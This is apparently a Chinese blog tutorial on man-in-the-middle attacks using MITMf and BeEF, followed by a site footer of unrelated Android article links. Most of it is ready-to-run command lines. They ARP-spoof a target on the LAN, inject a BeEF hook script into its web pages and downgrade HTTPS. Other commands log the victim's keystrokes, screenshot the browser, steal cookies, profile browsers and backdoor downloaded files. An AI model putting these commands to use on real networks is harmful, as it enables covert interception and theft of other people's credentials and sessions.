• 中间人攻击


     注入xss即使没有XSS漏洞,也可以凌空向每个HTTP请求中注入XSS攻击代码,一旦得手影响范围巨大,如果中间人发生在运营商路线上,很难引起用户注意。

    mitmf安装教程:https://github.com/byt3bl33d3r/MITMf/wiki/Installation

    apt-get install mitmf

    pip uninstall twisted

    wget http://twistedmatrix.com/Releases/Twisted/15.5/Twisted-15.5.0.tar.bz2

    tar -jvxf ./Twisted-15.5.0.tar.bz2

    cd ./Twisted-15.5.0.tar.bz2

    python setup.py install

    beef结合mitmf进行跨站脚本注入攻击

    启动beef
    cd /usr/share/beef-xss/
    ./beef
    mitmf中间人注入xss脚本
    mitmf --spoof --arp -i eth0 --gateway <网关地址> --target <目标地址> --inject --js-url <hookURL>

     

     到目标客户端打开浏览器访问bing网站时,打开源代码就会看到里面已经被插入了脚本攻击代码,而且已经被强制从https解密到http了。

     

    可以仅仅利用mitmf的插件也能进行一些很强大的攻击,比如键盘记录器
    mitmf --spoof --arp -i <网卡> --gateway <网关地址> --target <目标地址> --jskeylogger

    图片颠倒JOKE攻击

    mitmf --spoof --arp -i <网卡> --gateway <网关地址> --target <目标地址> --upsidedownternet

    被攻击的目标图片就全都颠倒过来了

    浏览器截屏,每十秒截屏一次,截屏图片存在/var/log/mitmf目录下

    mitmf --spoof --arp -i <网卡> --gateway <网关地址> --target <目标地址>  --screen

    抓取cookies,cookies存在/var/log/mitmf目录下

    mitmf --spoof --arp -i <网卡> --gateway <网关地址> --target <目标地址> --ferretng

    浏览器插件信息获取

    mitmf --spoof --arp -i <网卡> --gateway <网关地址> --target <目标地址> --browserprofiler

    凌空插后门

    --filepwn

  • 相关阅读:
    Android中Context样式分析
    Android组件化实践
    插着USB mic开机时,系统没有声音问题
    Android7.1 解决ttyUSB串口节点不固定问题
    android中设置里面版本号的显示
    android7.1添加开机启动服务被selinux禁用问题
    Settings中删除一些默认的选项
    es8323codec调节录播音量大小
    user版本串口不能输入
    高新兴GM510模块调试
  • 原文地址:https://www.cnblogs.com/zylq-blog/p/6727725.html
Copyright © 2020-2023  润新知